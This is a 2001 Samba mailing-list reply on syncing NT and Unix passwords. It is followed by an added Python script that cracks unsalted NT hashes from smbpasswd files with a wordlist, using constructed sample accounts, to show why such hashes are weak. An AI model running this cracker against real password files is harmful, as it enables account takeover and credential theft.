OT: change NT login procedure

Toomas Soome tsoome at ut.ee
Wed Jan 31 09:54:21 GMT 2001


James Sutherland wrote:

> > windows-> unix is a problem, because we do not get the cleartext old
> > password from the windows client (am I wrong?). if so, we must save
> > plaintext passwords into a safe place (crypted with some internal
> > key). it is generally a bad idea to have plaintext passwords around, but
> > in a university environment it is not totally unacceptable. I mean, such
> > a database must be protected with some sort of encryption and if someone
> > wants passwords, well, it is possible to use sniffers from pc classes,
> > one can do dictionary attacks against password hashes etc.
> 
> Against NT's "encryption", dictionary attacks are trivial (a few minutes
> to run a large wordlist); even brute force on an ordinary desktop PC isn't
> hard.

exactly.

> 
> > so, if safe storage for old (or current) passwords is implemented, the next
> > task is to rewrite the current samba interface for password change to use
> > the standard pam interface (with the old password from internal storage and the new
> > password from the client) and it's done. nice and clean.
> >
> > of course, there are but's. how to handle username maps, what happens if
> > we are going to have domain trust or kerberos environment etc...
> 
> Two possibilities:
> 
> 1. There is a pair of DLLs Novell replace in NDS for NT, which diverts all
> NT auth stuff (including password changes) onto the NDS tree.
> 
> 2. You can provide a "password filter" DLL to implement password checking
> when the user changes password (e.g. check the new password is over X
> characters, mixed case and numbers) - obviously, this DLL *IS* passed the
> plaintext password - and username, I think.

yes, and implementing a protocol to send these passwords securely to the unix
box is a relatively easy task as well.

> 
> Actually, if the NT machine tries to change the password on the Samba
> machine, it should be synchronised back to Unix anyway, shouldn't it? In
> which case, with Samba as your PDC, you should be OK.
> 
> The question is, can you get NT servers to authenticate against a Samba
> PDC now???

I'm doing this every day :) we do have here 4 NT classes authenticating
against a samba pdc (2.0.7) and lots of staff workstations. also I'm
currently working with samba 2.2.0 and w2k (w2k is joined to the samba
domain). sure, there are problems, but I can live with them and 2.2.0
looks very good - there is lots of work done to implement the missing
functionality.
 
toomas
-- 
Oh, I don't blame Congress.  If I had $600 billion at my disposal, I'd
be irresponsible, too.
		-- Lichty & Wagner
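
James's remark above, that dictionary attacks against NT's password hashes are trivial, is the reason the thread treats an encrypted plaintext store as no worse than the hashes a Samba PDC already keeps. The script below is an added illustration written for this page; it is not part of the thread and not Samba's code. It implements MD4 from RFC 1320 inline (so it runs on a stock Python without a legacy MD4 provider), derives the NT hash as MD4 over the UTF-16LE password with no salt, reads the NT hash from the fourth colon-separated field of smbpasswd-style lines, and runs a wordlist against every account at once. The account lines, usernames, passwords and wordlist are constructed for the example; the all-X LM field is the placeholder smbpasswd writes when no LM hash is stored.

```python
"""Added example: wordlist attack on unsalted NT hashes from an smbpasswd file.

The NT hash is MD4(UTF-16LE(password)) with no salt, so each wordlist entry
costs one MD4 and is compared against every account in the file at once.
MD4 is implemented inline per RFC 1320; nothing here is Samba's own code.
"""
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """MD4 digest per RFC 1320: little-endian words, three rounds of 16 steps."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)      # message bit length, little-endian
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):                       # round 1: F(x,y,z) = (x & y) | (~x & z)
            f = (b & c) | (~b & d)
            a = _rotl((a + f + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                       # round 2: G = majority, words 0,4,8,12,1,...
            k = (i % 4) * 4 + i // 4
            g = (b & c) | (b & d) | (c & d)
            a = _rotl((a + g + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                       # round 3: H = x ^ y ^ z, bit-reversed word order
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            h = b ^ c ^ d
            a = _rotl((a + h + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        A, B, C, D = (A + a) & MASK, (B + b) & MASK, (C + c) & MASK, (D + d) & MASK
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> str:
    """NT hash: MD4 of the UTF-16LE encoded password, lowercase hex. No salt."""
    return md4(password.encode("utf-16-le")).hex()


def parse_smbpasswd(text: str) -> dict:
    """Map username -> NT hash; the NT hash is the 4th colon-separated field."""
    accounts = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        accounts[fields[0]] = fields[3].lower()
    return accounts


def crack(accounts: dict, wordlist) -> dict:
    """Return {username: password} for every account whose NT hash is hit by the wordlist."""
    by_hash = {}
    for user, h in accounts.items():
        by_hash.setdefault(h, []).append(user)   # identical passwords share one hash
    found = {}
    for word in wordlist:
        h = nt_hash(word)                         # one MD4 per candidate, checked against all accounts
        for user in by_hash.get(h, ()):
            found[user] = word
    return found


# Constructed sample data, not taken from any real system. alice's hash is the
# well-known NT hash of "password"; the others are derived here for the example.
LM_UNSET = "X" * 32
SAMPLE_SMBPASSWD = "\n".join([
    "# constructed smbpasswd excerpt",
    "alice:1001:" + LM_UNSET + ":8846f7eaee8fb117ad06bdd830b7586c:[U          ]:LCT-3A77B2E1:",
    "bob:1002:" + LM_UNSET + ":" + nt_hash("tartu2001") + ":[U          ]:LCT-3A77B2E1:",
    "carol:1003:" + LM_UNSET + ":" + nt_hash("Xk9#vQ2!pL7m") + ":[U          ]:LCT-3A77B2E1:",
])
SAMPLE_WORDLIST = ["123456", "password", "letmein", "tartu", "tartu2001", "samba"]

if __name__ == "__main__":
    for user, pw in sorted(crack(parse_smbpasswd(SAMPLE_SMBPASSWD), SAMPLE_WORDLIST).items()):
        print(f"{user}: {pw}")
```

Because no salt is involved, the cost of the attack is one MD4 per candidate regardless of how many accounts the file holds, and two users with the same password show up as the same hash before any cracking is done; that is the property a plaintext store encrypted under a server-held key does not share, and the reason the thread can argue the trade-off is acceptable for a university.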